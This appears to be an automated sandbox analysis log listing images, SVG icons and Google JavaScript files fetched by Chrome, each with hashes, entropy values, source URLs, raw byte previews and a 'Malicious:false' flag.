                                                                                                                                                                                                                                                                                          Size (bytes):2018
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.567869290702255
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:gK9jv5RQ6SWRW631PSDHcpS6VnTMxSx/kjfooEH2bd:gK9rc6Sk5X2xShsT62bd
                                                                                                                                                                                                                                                                                          MD5:9B282D6F7D4EF76BD33E3BD8AD6F944C
                                                                                                                                                                                                                                                                                          SHA1:A05D234D5265BBE63CBEEFBCC584D288D036FDFE
                                                                                                                                                                                                                                                                                          SHA-256:3DCE4B1E1B0FD56F0552E03CEA8404EBDBF0A42534834255A2E85D0FC16E62F4
                                                                                                                                                                                                                                                                                          SHA-512:3409ECDB91502306A7A5E49CA3D66B632A7407A06A18C1F1D88236FF220C28C258F09CF4725426673A27E643D008C2EA51B10ED6BBCC318287BEAC649848F873
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....IDATx....NU..?/.;$?*e~..%*......L~.Wo...VKkd...[S......h.....$d.....B....sw.s..>.}^...g.;.9..s..|..{.cSPRR...........+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+.R..M...;U.tr.O.;..2....`".B..Q..'.._.t.6......4....)..|....Kx...;....Qp...........2..+U..._?.._........$........-.....c.k....`.++.N.....!.w.......T.,...M*C[.r......."..`.pE.k~s.H...(R6..........0.....w..f.P.9x.K.....=eh.."/.F..?..c.o....'h.....R.....]~.0........ ......=...o0...1K..]:7S.\..v.i.;`...ro.6..j.p.Z.SI.y..P...P....X....|M.o...].H.:.../....*x.KWxeA.N2..#./..g.....&0......p3.v...k..6w.k.y...^..{...G.h.....s.......|..^yr...{f...S2..r..n...Z..,....Z...bR#o...1..9.)..h.U.F...W...../ Xj....9W......[]yKB....].mJw.H....Q.{..:Q.y..l..2.G..(...X..t.....rW!#.?.....r.....}..b.!#.dtC(..P.O....W.*w.;W.L/.=.:.{u..t........,v.z.,u.4..#K..4.t...nq.i..W.....##....
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 52 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):1393
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.76818672377986
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:84ofs4OnVouAEHrxYUjnD9xD7xmm4X+jtZjYPJXGhJO0nH+bAUb8E3ENcPz:8HfjOnCuAELjvDl4ujjvhJdH+vbz0i7
                                                                                                                                                                                                                                                                                          MD5:56128C21AB781A28574BD2B51934B1D3
                                                                                                                                                                                                                                                                                          SHA1:7611E397F449D99340942B9CED59FEE8D7EEFB10
                                                                                                                                                                                                                                                                                          SHA-256:C46856F89997266EF65CC488CC26ADC4BE2E7D74B22270A4F4D2B686345888F1
                                                                                                                                                                                                                                                                                          SHA-512:ECF40C594019F6652D3DDA280DAF8C04CFF01FDFB214F04A3AEA9137F113837FCB0CA88C5CD5FC89532AA3E90D4BFB5B1219DDF937548428496C4B3A19590AA6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/ZMCHBfKVC7oSCxxtvkae5NyqbaBP1jWinuOL1-JzGLn76GZgt3biivir1R2Pf12ro4Ml30diU4FrRzUCpjdYaElU-vX19ibxmvb9bxB9I0AkuY9stg=-h48-e365-rwu
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...4...0.....^.Y.....sBIT....|.d....(IDATh..[l.U....i.mk..!.S\@1..mw..%t.h ./!F"...1h$..LL@}P...>..J.........BA:MM.@.BR.;.].R.......,{....V....{....9.|s........p..}u.A.....w....e....%..7.x.@..._.,..~..C.{g....J.lN2..MgB..HN.h...Q;.n<.`Q....ac?.x.......<..Yu..I.L.C.HD.H......qW*?....fn.P9A|/@...3W....h....O2......qp..=.)...^oq[....g/..g.X..h...xk..$..H..+.n;.9..9....`6B.p9 ......=Dd...3#ql. ;.#..."....,.R.R.O2.....v.(.n...&........b ..[...M.x......z@~....{.x...`. ....m.!./uE...%..\W.3..v..Hf.W.hK[X.r..m...X.+r.....Od.+....>.>......S..........*v..3..]........b!...?....k.........5u.i..z..M....*6.{j.o.x>j..u..u.....Q......uE...n7.E2qltN.u.....?YI.d|Q.Z&"...M/]...[..#.....uE~..tE>..u....".........BQq.9..*'r....[....|v.(..p....XW.Q....`.......\...Yl.9......(....k....s&Y#N..@.SG.&.8.^..0..U.~.|s..;.4...\.k..!...0.S]N .&..j....J8.+).k.. ..Z.......\."..A.8.v#..H.....u.....<..#3..X&..L+....%..x..Y...c...]o.h.6.....n...c$r..`....uy.O..H...@...
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 512x384, components 3
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):39975
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.956038562229301
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:Yp6ZaktUB9oQ9N62ex6rTFt6CWh6sW/mWy+x0TGWGuwJHENfJJak:YcPdQyeFAh6sWObW0T4ZHol
                                                                                                                                                                                                                                                                                          MD5:AD9E05AA6369227CA1148D86159B5418
                                                                                                                                                                                                                                                                                          SHA1:0992E7FC72D8651714D3E3226FCDA5F140AC091E
                                                                                                                                                                                                                                                                                          SHA-256:4E1FFDC86847DE0C72A4E3BCF0B559E65B439CAD79FBDBDAA8F30B6DDCE2D48D
                                                                                                                                                                                                                                                                                          SHA-512:09960A794B29AF6A5F61AAE794D417565388B8EEA844F5359EDE77FA4580C7274CFEE2BB09DC561B384FB5A34AAB7A0EB377C8A67BA376E37A462707F30374E5
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/xeVlvzZX32eg9zc9V7MLUWaEeOnwoa5OQfrgI10U4ub8QA6iwdq1TgcOpLTBiKQTosiNxtMBtpOvh_z7fq7eoISf53UZqZMd0dZR0gSLAAMFkK9vVfQ?=w1440
                                                                                                                                                                                                                                                                                          Preview:......JFIF.....................................................................................................................................................................................................X........................!..1AQ.."a2q.....#BRr..3b...$CS...........Tcs.....5DEU...%4t..................................;........................!1AQa.q....."2....B.R.b#$3Sr.................?..%dy.P.j...&.C@%.....@%..4 CB...-@!....,h.&.C@.....@........&..@6.@6h.j....@.....o.e.|I...s.e....X..w......8.Ov.....%.np~..1..sD$..W1....9rJPeQ{e6.....o...f..4....8..X..5&......wk.'..I`.8...K..8"..oq..]..R.9+&m.....H.~.....M_*".....QbL.....\..........l..X}...M..=...C.."oa..r...s.B}.z.Hj9\U2.;..d.#_.S<r....x..^.....WP....B..'....}....^....r.f..^...T.l....yi~c.9..2.D.....q..........Y...+.....h.Kxl.......mx....Q...8m..Ojl.r.lAgnzt'K...xi^..fW...".X H._.......].2x..MI.a.....E.HA..)f9...g.U....t...%.E..W.hoZ..JdD[......U/.8$.?u.-.[...Q......6..V.\>b....RH..".bT6RG..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (3521)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):21590
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.396142031067612
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:/h0cEX6ZB6/NfqrgR0Jlm0OU/asm0M9WkugJ6pmzF0mJJRdGbFJgBeAD+cvl2B:/chNfGgR0Jlm0OU/asm0M9Wkug26DRsj
                                                                                                                                                                                                                                                                                          MD5:80D62A6AA980F11422556FE8065B4CAB
                                                                                                                                                                                                                                                                                          SHA1:CD272FA4DAD7328B3884393E59458B4C03D4CC25
                                                                                                                                                                                                                                                                                          SHA-256:E70AA93344F17D038C8854DE1243A54A7A0AA478143E1AFBFF48DF14F0DE4343
                                                                                                                                                                                                                                                                                          SHA-512:3A73C667C7224CDFBE67B5AFC12E7C5305B49396C7E3BE3541DE1DE58C17296C86B5FD42805BB96EFA7F565B0BC9347EDF1EA51DE0B7B62FC233C5858ABB8A84
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:"https://www.gstatic.com/_/mss/boq-one-google/_/js/k=boq-one-google.OneGoogleWidgetUi.en.eh1Y-00lhsg.es5.O/ck=boq-one-google.OneGoogleWidgetUi.hnwCoQrxzwQ.L.B1.O/am=IEAwYGw/d=1/exm=A1yn5d,A7fCU,BVgquf,EEDORb,EFQ78c,GkRiKb,IZT63,JNoxi,KUM7Z,L1AAkb,LEikZe,MI6k7c,MdUzUe,Mlhmy,MpJwZc,NwH0H,O1Gjze,O6y8ed,OTA3Ae,OmgaI,PrPYRd,QIhFr,RMhBfe,SdcwHb,SpsfSb,UUJqVe,Uas9Hd,Ug7Xab,Ulmmrd,V3dDOb,XVMNvd,Z5uLle,ZDZcre,ZfAoz,ZwDk9d,_b,_tp,aW3pY,aurFic,byfTOb,e5qFLc,ebZ3mb,fKUV3e,gychg,hKSk3e,hc6Ubd,kWgXee,kjKdXe,lazG7b,lsjVmc,lwddkf,mI3LFb,mdR7q,n73qwf,ovKuLd,pjICDe,pw70Gc,s39S4,w9hDv,wmnU7d,ws9Tlc,xQtZb,xUdipf,yDVVkb,yYB61,zbML3c,zr1jrb/excm=_b,_tp,calloutview/ed=1/wt=2/ujg=1/rs=AM-SdHtG5mpbAvjw6lx2uzOrYGtSsP2slQ/ee=EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:SdcwHb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;Uvc8o:VDovNc;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:QIhFr;lOO0Vd:OTA3Ae;nAFL3:s39S4;oGtAuc:sOXFj;pXdRYb:MdUzUe;qafBPd:yDVVkb;qddgKe:xQtZb;wR5FRb:O1Gjze;xqZiqf:wmnU7d;yxTchf:KUM7Z;zxnPse:GkRiKb/m=RqjULd"
                                                                                                                                                                                                                                                                                          Preview:"use strict";this.default_OneGoogleWidgetUi=this.default_OneGoogleWidgetUi||{};(function(_){var window=this;.try{._.q("RqjULd");.var Zha=function(){var a,b,c,d;return(d=sG)!=null?d:sG=Object.freeze({Zb:function(e){return _.rf(_.He("iCzhFc"),!1)||e===-1},Jg:(a=_.Ul(_.He("y2FhP")))!=null?a:void 0,uN:(b=_.Ul(_.He("MUE6Ne")))!=null?b:void 0,eg:(c=_.Ul(_.He("cfb2h")))!=null?c:void 0,Ze:_.nA(_.He("yFnxrf"),-1),DC:_.oA(_.He("fPDxwd")).map(function(e){return _.nA(e,0)}).filter(function(e){return e>0})})},$ha=function(a){if(_.n&&_.n.performance&&_.n.performance.memory){var b=_.n.performance.memory;if(b){var c=new tG;isNaN(b.jsHeapSizeLimit)||._.xf(c,1,_.kd(Math.round(b.jsHeapSizeLimit).toString()));isNaN(b.totalJSHeapSize)||_.xf(c,2,_.kd(Math.round(b.totalJSHeapSize).toString()));isNaN(b.usedJSHeapSize)||_.xf(c,3,_.kd(Math.round(b.usedJSHeapSize).toString()));_.il(a,tG,1,c)}}},aia=function(a){if(uG()){var b=performance.getEntriesByType("navigation");if(b&&b.length){var c=new vG;if(b=b[0]){switc
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:gzip compressed data, max compression, original size modulo 2^32 15071
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):4713
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.951283256676123
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:YaLY0x7bFU4aXDQ1giFdlgDJGKTXffkiNqYT871IpHvBx8QdsB:YaUgKxXU1giFdleYCv0f2vUQ6B
                                                                                                                                                                                                                                                                                          MD5:C368BE0062D64DA9636D9D8652DFF7C7
                                                                                                                                                                                                                                                                                          SHA1:EDDF5F91683C626D474A8C1F582E04AC9A1890AD
                                                                                                                                                                                                                                                                                          SHA-256:67A9DE65373797213F6E0CBE22B07520385D1B8F3CB7B98A9DBBDEA18B862B16
                                                                                                                                                                                                                                                                                          SHA-512:22ABB8487EA4013DA9FD336B11DA08DA327E68CD828AA65C80D9854903A3BCE426C4527DCAA78706628A8880BE986434A18C63FEA0ED3884F7A1553D2DA260BD
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://sustainability.google/static/img/glue-icons.svg
                                                                                                                                                                                                                                                                                          Preview:...........Ko.F.....v...H.]. ...an.Y...%A...~..jR...9....d.cv....U..b....>..].?^-....?|xzzJ..d.....4.......]....A.W......q.Y....p..W...7.|.J.4.9.......Co\...*xL\..m\G.....1i.:..g..M.`...[./......\.s.D>m.8.h..Vsy.w.[....o..~?.7....'>.\........6xiw.r...bh9.1..'y.FEV.J...G..KK.v..S.e6...J..W......1..W.a...>=......6....vh.....K...G.t..V8..U@....<n.e...h....l....T..........n...~..PX4......(.Xc.v.1..7..<..#..V....\:.T.El?G.....m...vHN8........S....ik0...... .......J.U...j.M..q......k..>?..*.<.K...'i.WI..I...#.%y...M.s..BY....(....96.%WQ.\.....r.dU.d..yR[a.o.X#....>R=....>..V5q..q.G.y.x..QR..HSI.."F.....X?.q...KWC.q&".q....^...8....6>.v.&...s.%k..<.}O......T.D~."G.#..=.8A...?..I...V.E........%........5Q6...ptb.......t.v.t...A...,NJVK...&........b#;...n..........%.S,.u...i.........K ...e__ c2#.T...{.,#w.v.KE....B...d.A.`j.|..pR^....A.h.Z^...,YP.5...q..).^.A..._...v..W.x.x...x.q1-...!.I..q..bY....oE...:...<.0.Q8M......i.By.Rr..Nf.._V...f=..`.S .)......c&...C.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:gzip compressed data, max compression, original size modulo 2^32 670
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):413
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.50431141961128
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:XExgpUIbIW3IvV+bEQ5Ron5685/hNTUuoX:XjbIW3Iv0TPon5685pe
                                                                                                                                                                                                                                                                                          MD5:F97808245ABF517E6F4ADF0889FF373F
                                                                                                                                                                                                                                                                                          SHA1:7684C9F19C481FD2C74CC9BCB774784C63A54FB6
                                                                                                                                                                                                                                                                                          SHA-256:1B7CDAD8F8AF0A483973D7754501C8892894E862542F0B55635EFA0257F32835
                                                                                                                                                                                                                                                                                          SHA-512:BBA0DD424EF9A079C69C412A27A43FCCC01C401D82375E2D1D5375F041CD2BA22DCAB38D97FAC6B0CAF9A5F21EE9AC3776D43FDBEA0CDC1CB88CF388EF642B05
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://recovertogether.withgoogle.com/static/images/icons/carousel-arrow-right.svg
                                                                                                                                                                                                                                                                                          Preview:..........lRMo.0...WL..D.ml.......{.+.8`..F..l.}.W.E......z..5\....9M..9.N..._?......._z.T...I.+. U?..E2W.%./.Zc....D.y#.....5.!...i.SJ..H..E..r.jeN.#.,.bs.1....wi.k.u.x<.p. ..........>Z..m......4..Z6.sv..Z.....m.].=..>......TW.....j....'Y..F........9'.EG..Hc.n.k.m.]."O/!X....!^.!...g..5...-..Q........w{.5~...".............~...0ZeB..(i...y.!..r....A. Rl*....}...b.....T./..........t.....
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):10906
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.976159811086094
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:TOgtGkBrrBF40535s0+0IuklO7ifO00Mj5hjnR1aY1ozr0YI/rOgL99UHKh9TBO2:TOmHBt5JdGw7ify8hjPB1of5I/66fJhV
                                                                                                                                                                                                                                                                                          MD5:21C3437676BD897D92D912BC18FAB8E0
                                                                                                                                                                                                                                                                                          SHA1:E99E5CEF97011C5A4211A80AC9658740B9E887F4
                                                                                                                                                                                                                                                                                          SHA-256:92D6567B2D8FD8559F9280C426D4710E3F6E660689E7830D698ECF8DDDB8E2B9
                                                                                                                                                                                                                                                                                          SHA-512:CA578C3BAA1FA96F31A80732664E2E438D40200B0944788DC92F5FD27B3F3E4C2C55967E8D624F2E765A1576FAB076C6A3379B87AF8D9F7C437B033F1F2CF2B5
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/33fCN1bFbB2G1iGDGzlBd_BAWes-Nlv-Qt8ByRpEBU43Lu_mF6twx5kmmN4OE6Z_Gz6x7qXTStQItO4yGA0eEejKPSmSqPb-xpF-=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d... .IDATx..w.%G}.?....{..$Ih....PF..l.w..c0...@.6`.....:p..{If.66.H....6..,..DVB.e.4...y......?:...0..9..s...........jx.....9z..... y.....7..cyg.jl..[p].wT]..............@L..3w(...3...g7.......l.x....1..*....Z.cT......%E\......4...U;#...<.7f.kt..v....L...........tW.J.:..].....UG6.,'-.z......W.T..*..P..U....!.Gp.8....x4BU?P...X.;r...v..}p...=...|i...x.gv..1....9qN..axVAd..4B.a.@[..@...A.....T.c.@..!....P..9...Wom....}..<xxz.rt.....W^0f^^.qQ=..f`.ta...B%.V.n.U.!..r.2..8@..<....r.sO.p..w.....:*.....gvO.....:.j-.s..P#N.q.......(.w..u,@... .l/zr...M.k................]........*k..~/.b..}...xX...I.y"xF1F.V<..U.{<(].;6..m.........qy.K.B=...j...`X.x.~_........'.92Sv.Cu.|f..}.GuG..Q.W_...c...f(..7.....=.?.bz..{.;....({f..q...yo..-w....3..I....E...}-.....".xIu,...........|.K..Y.j.;.y.?.......}.P.[..]8.u+...{.+...Gl.W.t..=.;ld...^..gU.......}H..Q[.wT...T...p.:.....>r$.}D../?^....p.o{.XX.E;....
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):5430
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.6534652184263736
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:wIJct3xIAxG/7nvWDtZcdYLtX7B6QXL3aqG8Q:wIJct+A47v+rcqlBPG9B
                                                                                                                                                                                                                                                                                          MD5:F3418A443E7D841097C714D69EC4BCB8
                                                                                                                                                                                                                                                                                          SHA1:49263695F6B0CDD72F45CF1B775E660FDC36C606
                                                                                                                                                                                                                                                                                          SHA-256:6DA5620880159634213E197FAFCA1DDE0272153BE3E4590818533FAB8D040770
                                                                                                                                                                                                                                                                                          SHA-512:82D017C4B7EC8E0C46E8B75DA0CA6A52FD8BCE7FCF4E556CBDF16B49FC81BE9953FE7E25A05F63ECD41C7272E8BB0A9FD9AEDF0AC06CB6032330B096B3702563
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:............ .h...&... .... .........(....... ..... ............................................0...................................................................................................................................v.].X.:.X.:.r.Y........................................q.X.S.4.S.4.S.4.S.4.S.4.S.4...X....................0........q.W.S.4.X.:.................J...A...g.........................K.H.V.8..........................F..B.....................,.......................................B..............................................B..B..B..B..B...u..........................................B..B..B..B..B...{.................5.......k...........................................................7R..8F.................................................2........Vb..5C..;I..................R^.....................0................Xc..5C..5C..5C..5C..5C..5C..lv..........................................]i..<J..:G..Zf....................................................
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 60 x 60, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):4175
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.792037496841981
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:CNjUwmdPbBhCwrndwU/FVNk3twv+EEXFx9y8TFk:884wT1bi39EuVymk
                                                                                                                                                                                                                                                                                          MD5:528CFAAE326A3BB9E2AC8FA84F86B629
                                                                                                                                                                                                                                                                                          SHA1:2896806E67CA814B3A1CDCB3269570AE59CD63F5
                                                                                                                                                                                                                                                                                          SHA-256:208D04BF349F845F35F37B1F14EA345663C3A538408CF593CCC57D0AA8746565
                                                                                                                                                                                                                                                                                          SHA-512:81DC39DF65F3455A96356621DCED76F92253F13AF90A4048D154FA24BE322D6B8DD4B98A75A2840EF802577418F09A029A1D770EF4D2F61AF3DE902C9EFDB9F4
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...<...<.....:..r....tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:fad22fce-9b5e-40af-8da4-79ebc9d7b747" xmpMM:DocumentID="xmp.did:77C7253ABDC411E7AA94B0991AE57A61" xmpMM:InstanceID="xmp.iid:647C83D0BDBA11E7AA94B0991AE57A61" xmp:CreatorTool="Adobe Photoshop CC 2015 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2b506a1b-0412-4705-a778-18e227438701" stRef:documentID="adobe:docid:photoshop:db2f6a03-054e-117b-b783-bbf95c42df91"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>`H....._IDATx..[{pT.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):840
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.203749514981059
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:tdLnulpkscLuJGf0nsEGHm/EUyOp/L+coJwQQkRZi//:/2kscLuJGf0nsEGHORNL+bJnRkn
                                                                                                                                                                                                                                                                                          MD5:EE6CF301BE3DB406E50C4BF45FFB7B54
                                                                                                                                                                                                                                                                                          SHA1:4E62B36F5A095D2CA558E65FEEE14FA34672D352
                                                                                                                                                                                                                                                                                          SHA-256:57395E24036A1A8BD8BBB4A9AE57C0589480C1235032CCF02E88382C110F39DA
                                                                                                                                                                                                                                                                                          SHA-512:A320C301F776A518E8C0EBF3DE37CCF999C5987E2BCA2267AFDE2A5AB367972D1654BE2792C211F245550506FC8F3D28A5F714155A199188432516777280622D
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<svg width="34" height="34" viewBox="0 0 34 34" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M17 0.333496C7.80004 0.333496 0.333374 7.80016 0.333374 17.0002C0.333374 26.2002 7.80004 33.6668 17 33.6668C26.2 33.6668 33.6667 26.2002 33.6667 17.0002C33.6667 7.80016 26.2 0.333496 17 0.333496ZM15.3334 30.2168C8.75004 29.4002 3.66671 23.8002 3.66671 17.0002C3.66671 15.9668 3.80004 14.9835 4.01671 14.0168L12 22.0002V23.6668C12 25.5002 13.5 27.0002 15.3334 27.0002V30.2168ZM26.8334 25.9835C26.4 24.6335 25.1667 23.6668 23.6667 23.6668H22V18.6668C22 17.7502 21.25 17.0002 20.3334 17.0002H10.3334V13.6668H13.6667C14.5834 13.6668 15.3334 12.9168 15.3334 12.0002V8.66683H18.6667C20.5 8.66683 22 7.16683 22 5.3335V4.65016C26.8834 6.6335 30.3334 11.4168 30.3334 17.0002C30.3334 20.4668 29 23.6168 26.8334 25.9835Z" fill="#202124"/>.</svg>.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (10636)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):355172
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.6580024923961565
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6144:XuzL7PJOuReC2a2mZb2Q3WsvHI1pGTRs6pzpaZV4Y8YryVdImDyMKGkyTGTbBZnK:XuzL7PJOuReC2a2P+vHVpzp6MKG7GTbG
                                                                                                                                                                                                                                                                                          MD5:B8777E7CB409C50DBDF178066AD4B0A4
                                                                                                                                                                                                                                                                                          SHA1:CFD97A5271D2F3EE0E5BCF519887E302552AFF36
                                                                                                                                                                                                                                                                                          SHA-256:9B8AEEB64A135274ED46FADBED7C6E6C5B5B043C788A501E2FD02683B34B728D
                                                                                                                                                                                                                                                                                          SHA-512:A2336FE2CD84BAA20E48B2812DB809343158074A3822CAB59A8D5A79A22FD097E37A7AA52CBE37298216F640C20A352E080300A3854C8DB0416761847D6C32CB
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:..window.google = window.google || {};.google.maps = google.maps || {};.(function() {. . var modules = google.maps.modules = {};. google.maps.__gjsload__ = function(name, text) {. modules[name] = text;. };. . google.maps.Load = function(apiLoad) {. delete google.maps.Load;. apiLoad([0.009999999776482582,[null,[["https://khms0.googleapis.com/kh?v=988\u0026hl=en\u0026","https://khms1.googleapis.com/kh?v=988\u0026hl=en\u0026"],null,null,null,1,"988",["https://khms0.google.com/kh?v=988\u0026hl=en\u0026","https://khms1.google.com/kh?v=988\u0026hl=en\u0026"]],null,null,null,null,[["https://cbks0.googleapis.com/cbk?","https://cbks1.googleapis.com/cbk?"]],[["https://khms0.googleapis.com/kh?v=163\u0026hl=en\u0026","https://khms1.googleapis.com/kh?v=163\u0026hl=en\u0026"],null,null,null,null,"163",["https://khms0.google.com/kh?v=163\u0026hl=en\u0026","https://khms1.google.com/kh?v=163\u0026hl=en\u0026"]],null,null,null,null,null,null,null,[["https://streetviewpixels-pa.googleapis.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (4218), with no line terminators
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):4218
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.531108818182425
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:V23OppIdgNlLIjeRSbcDNdm7xKAwogIOafN8fNDzFMqwWgNUIu9ThP:Q36IdtjKudhd4tzFlwLNU9xhP
                                                                                                                                                                                                                                                                                          MD5:F2EC8CD5E1212CB246E3B3E2CB77DDC7
                                                                                                                                                                                                                                                                                          SHA1:C35BFECA9251CACFA92F91DDF2BDA288EFCE40F3
                                                                                                                                                                                                                                                                                          SHA-256:AA8E7EA3728BF18A98E17CA1B5B413D1C3A8FD573F5A31D31F51570D39F9AE39
                                                                                                                                                                                                                                                                                          SHA-512:26CE3D1F19DC9173A18FB27E42F8300F7DFD840AFBB807DDB681732A22894E6574FEE474BA0B1E289DABFCA24F8B6353899A9C91BA46A73742E2C693E180358D
                                                                                                                                                                                                                                                                                          Malicious:false
